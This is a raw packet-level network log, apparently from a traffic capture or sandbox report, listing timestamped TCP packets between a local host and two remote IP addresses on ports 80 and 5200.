Jan 8, 2021 09:34:54.552414894 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.552454948 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.569210052 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.571247101 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571278095 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571302891 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571326971 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571348906 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571361065 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.571387053 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571402073 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.571419954 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571444035 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571466923 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571492910 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.571502924 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.571532011 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.611525059 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.630311966 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630343914 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630363941 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630383968 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630403042 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630424976 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630435944 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.630446911 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630467892 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630475998 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.630489111 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630508900 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630528927 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630538940 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.630548954 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.630582094 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.630608082 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.638673067 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638757944 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638792992 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638814926 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.638828039 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638849974 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638870955 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638887882 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.638901949 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638923883 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638943911 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.638955116 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.638974905 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.638989925 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639012098 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639029980 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639046907 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639064074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639086962 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639096975 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.639121056 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639143944 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.639154911 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639168978 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.639188051 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.639273882 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.639309883 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.644274950 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.644304037 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.644414902 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.688838959 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693223953 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693276882 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693346977 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693357944 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693460941 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693516970 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693543911 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693615913 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693664074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693680048 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693700075 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693726063 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693737984 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693759918 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693783045 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693805933 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693820953 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693839073 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693864107 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693873882 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693890095 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693912029 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693926096 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693943024 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693955898 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.693974018 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.693993092 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694015026 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694036007 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694050074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694076061 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694084883 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694108963 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694133043 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694154024 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694171906 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694184065 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694200993 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694225073 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694248915 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694272041 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694293976 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694317102 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694328070 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694359064 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694384098 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694396973 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694417953 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694441080 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694462061 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:54.694483042 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.694516897 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:54.704881907 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:59.173947096 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:59.174105883 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:35:09.995851994 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:35:19.491378069 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:19.538728952 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:19.538856983 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:19.590357065 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:19.649931908 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:19.788256884 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:19.896162033 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:19.897342920 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:19.949027061 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.040607929 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.061161041 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.146429062 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.603382111 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.603439093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.603476048 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.603523016 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.603553057 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.603590012 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.650732994 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650798082 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650841951 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650880098 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650898933 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.650918007 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650958061 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.650959015 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.650994062 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.651014090 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.651034117 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.651559114 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698177099 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698225021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698261023 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698292017 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698307037 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698324919 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698338032 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698359966 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698390961 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698411942 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698422909 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698456049 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698496103 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698501110 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698533058 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698546886 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698565960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698599100 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698611021 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698679924 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698714018 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698744059 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.698767900 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.698801994 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745604038 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745640993 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745667934 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745692968 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745728970 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745750904 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745768070 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745774984 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745815039 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745815039 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745821953 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745840073 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745872974 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745877981 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745899916 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745923042 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745949030 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745949984 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.745970964 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.745990038 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746009111 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746033907 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746038914 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746061087 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746066093 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746087074 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746114016 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746128082 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746140003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746159077 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746164083 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746186972 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746208906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746222019 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746232986 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746257067 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746278048 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746279001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746289968 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746305943 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746330976 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746352911 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746366024 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746377945 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746400118 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.746431112 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.746467113 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.795696020 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795733929 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795758009 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795783043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795805931 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795831919 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795850992 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.795859098 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795883894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795896053 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.795902967 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.795909882 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795933962 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795954943 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.795955896 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795978069 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.795993090 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796000957 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796030998 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796053886 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796076059 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796096087 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796097040 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796106100 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796114922 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796119928 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796140909 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796158075 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796175003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796191931 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796210051 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796226978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796248913 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796272993 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796295881 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796313047 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796317101 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796339989 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796363115 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796386957 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796399117 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796411037 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796411991 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796433926 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796458960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796473026 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796480894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796503067 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796524048 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796535015 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796547890 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796565056 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796574116 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796596050 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796598911 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796621084 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796641111 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796653032 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796662092 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796683073 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796696901 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796705008 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796722889 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796727896 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796753883 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796776056 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.796782970 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.796861887 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.843874931 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.843935013 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.843974113 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844011068 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844049931 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844063044 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844104052 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844139099 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844141960 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844166040 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844181061 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844228983 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844271898 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844279051 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844307899 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844347000 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844352007 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844387054 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844424963 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844436884 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844463110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844502926 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844515085 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844552040 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844693899 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844707966 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844732046 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844770908 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844779015 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844808102 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844845057 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844857931 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844882965 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844921112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.844928026 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.844969988 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.845012903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.845016956 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.845046043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:20.845089912 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:20.926554918 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.862752914 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:35:22.914880991 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.914942026 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:35:22.914992094 CET	5200	49747	37.46.150.86	192.168.2.4
